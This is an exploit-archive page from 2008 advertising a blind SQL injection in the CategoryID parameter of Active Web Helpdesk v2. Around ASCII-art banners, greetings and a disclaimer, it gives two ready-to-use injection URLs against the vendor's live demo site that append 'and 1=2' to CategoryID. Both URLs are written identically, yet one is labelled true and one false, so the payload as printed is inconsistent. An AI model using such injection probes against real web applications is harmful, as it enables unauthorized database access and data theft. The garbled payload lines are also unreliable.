[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Active Web Helpdesk v 2 (CategoryID) Blind SQL Injection Vulnerability
# Published : 2008-11-30
# Author : Cyber-Zone
# Previous Title : Active Price Comparison v4 (ProductID) Blind SQL Injection Vulnerability
# Next Title : Active Photo Gallery 6.2 (Auth Bypass) SQL Injection Vulnerability
***********************************************************************************************************************************************************
[!] [!]
[!] OOOO O OOOOOOOOO [!]
[!] O O O O O [!]
[!] O O O [!]
[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
[!] O OOO OOO O O O O OO O O O O OO O O O [!]
[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
[!] O O OOOO O O O O O O O O O O O [!]
[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
[!] OO [!]
[!] OO [!]
[!] OO Proud To Be MoroCCaN [!]
[!] OO [!]
***********************************************************************************************************************************************************
+---- Bismi Allah Irahmani ArraHim ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [ Active Web Helpdesk v 2 (CategoryIDBlind) SQL Injection ] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: Author : Cyber-Zone ( Abdelkhalek) : : :
?| E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ?| ?| ?|
?| Home : WwW.IQ-Ty.CoM ?| ?| MySQL Version Is : ?|
?| From : Mor0ccan nightamres ?| ?| ?|
?| Script : http://activewebsoftwares.com ?| ?| ![ ]! ?|
?| Download : http://activewebsoftwares.com/P12_ActiveWebHelpdesk.aspx?Tabopen= ?| ?| ?|
?| RisK : High [?|?|?|?|?|?|?|?|] ?| ?| ?|
?| --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ?|
?| From The Dark Side Of MoroCCo ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: :
?| Remember : ?|
?| ------------- ?|
?| ?|
?| This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ?|
?| ?|
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an [!] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
ExploiT :
http://activewebsoftwares.com/demoactivewebhelpdesk/default.aspx?CategoryID=66%20and%201=2 false
http://activewebsoftwares.com/demoactivewebhelpdesk/default.aspx?CategoryID=66%20and%201=2 true
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
+---- ThanX To ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
= [AttaCk Is CompLet] =
___________________________________________________________________________________________________________________________________________________________
# www.Syue.com [2008-11-30]